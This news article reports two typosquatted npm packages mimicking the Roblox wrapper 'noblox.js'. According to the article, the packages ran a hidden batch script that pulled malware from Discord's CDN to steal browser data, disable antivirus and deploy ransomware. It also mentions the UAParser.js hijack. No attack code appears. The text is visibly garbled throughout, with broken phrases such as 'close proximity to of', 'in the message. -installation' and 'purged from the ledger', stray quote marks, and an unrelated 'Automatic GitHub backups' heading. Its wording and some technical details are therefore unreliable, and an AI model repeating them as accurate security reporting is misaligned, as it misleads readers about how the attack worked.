Malicious NPM Libraries Caught Installing Password Thief and Ransomware


Malicious actors have once again released two more typosquatted libraries to the official NPM repository that mimic a legitimate package from Roblox, the game company, for the purpose of distributing stolen credentials, installing Trojan horses, ‘remote access and infect compromised systems with ransomware.

The bogus packages – named “noblox.js-proxy” and “noblox.js-proxies” – have been found to mimic a library called “noblox.js”, a Roblox game API wrapper available on NPM and boasts close proximity to of 20,000 weekly downloads, with each of the poisoned libraries, downloaded a total of 281 and 106 times respectively.

Automatic GitHub backups

According to Sonatype researcher Juan Aguirre, who discovered the malicious NPM packages, the author of noblox.js-proxy first posted a benign version which was later tampered with with obscured text, in effect, a Batch script ( .bat), in the message. -installation of the JavaScript file.

This batch script, in turn, downloads malicious executables from Discord’s content delivery network (CDN) that are responsible for disabling anti-malware engines, persisting on the host, siphoning off information from the host. ‘browser identification and even binaries deployment with ransomware capabilities.

Recent research from Check Point Research and Microsoft-owned RiskIQ has revealed how threat actors are increasingly abusing Discord CDN, a platform with 150 million users, to continuously provide 27 families of Unique malware, ranging from backdoors and password stealers to spyware and Trojans.

Although the two malicious NPM libraries have since been removed and are no longer available, the results are another indication of how popular code registries such as NPM, PyPI, and RubyGems have become a lucrative frontier for carrying out various attacks.

The disclosure also reflects a recent supply chain attack targeting “UAParser.js”, a popular NPM JavaScript library with over 6 million weekly downloads, which resulted in the developer’s account being hacked to corrupt the package with the cryptocurrency mining and credential theft malware. , days after three more cryptocurrency mining packages were purged from the ledger.

Leave A Reply

Your email address will not be published.